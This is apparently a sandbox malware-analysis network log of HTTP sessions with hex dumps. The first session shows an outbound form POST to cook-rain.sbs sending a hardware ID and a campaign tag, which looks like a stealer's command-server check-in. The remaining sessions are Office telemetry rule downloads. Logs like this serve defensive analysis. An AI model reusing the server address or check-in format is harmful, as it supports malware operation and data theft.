                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 1229
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:27 UTC1229OUTData Raw: 2d 2d 34 41 56 31 39 50 4c 33 50 44 54 34 43 34 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 34 41 56 31 39 50 4c 33 50 44 54 34 43 34 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 41 56 31 39 50 4c 33 50 44 54 34 43 34 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                                Data Ascii: --4AV19PL3PDT4C4YContent-Disposition: form-data; name="hwid"32809CE1B9805DCB63CFCF7E6C45F838--4AV19PL3PDT4C4YContent-Disposition: form-data; name="pid"1--4AV19PL3PDT4C4YContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                                2024-11-20 09:54:27 UTC981INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=mp93rvc65hrp7d8bokehm9a6f8; expires=Sun, 16-Mar-2025 03:41:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3N0vQX%2F6Ei2zD4L5DscYyG2hvSZ%2Fnc93fKZuF886a5%2F2rLhgGCfyYPb5dkOtsTKRnh8e4x96CKdfvADNjEiG9ve5FNieMB7jWC6EPFuE1FnxEHRAfis1XdLkE4MFuMO5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578f0b7bca436c-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2140&delivery_rate=1790312&cwnd=243&unsent_bytes=0&cid=8ba8b0a6792f2272&ts=264&x=0"
                                                                                                                                                                                                2024-11-20 09:54:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-20 09:54:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                67192.168.2.74977013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                x-ms-request-id: 733c43f5-901e-007b-0e8c-3aac50000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-1777c6cb754j47wfhC1TEB5wrw00000005c000000000062g
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                68192.168.2.74977313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                x-ms-request-id: 495def62-b01e-0098-458c-3acead000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-185f5d8b95csd4bwhC1NYCq7dc00000009xg00000000ckc7
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                69192.168.2.74977213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                x-ms-request-id: d35eaebc-501e-0064-178c-3a1f54000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-r1d97b99577ckpmjhC1TEBrzs000000008sg0000000051nt
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                70192.168.2.74977113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                x-ms-request-id: 0cd4e810-101e-0079-148c-3a5913000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a8g000000003683
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                71192.168.2.74977413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-r1d97b99577lxltfhC1TEByw2s00000008qg000000009que
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                72192.168.2.74977713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 432
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                x-ms-request-id: 8be6aac8-801e-008c-1a13-3b7130000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-r1d97b99577l6wbzhC1TEB3fwn00000008u0000000007d41
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                73192.168.2.74977513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                x-ms-request-id: bfe6dbcf-201e-006e-678c-3abbe3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-r1d97b99577hsvhhhC1TEByb1w000000031000000000462t
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                74192.168.2.74977613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                x-ms-request-id: 9cb1ed33-701e-0021-398c-3a3d45000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-185f5d8b95ckwnflhC1NYCx9qs0000000a2g00000000ac8z
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:28 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                75192.168.2.74977813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095428Z-185f5d8b95cqnkdjhC1NYCm8w800000009xg000000008fgg
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
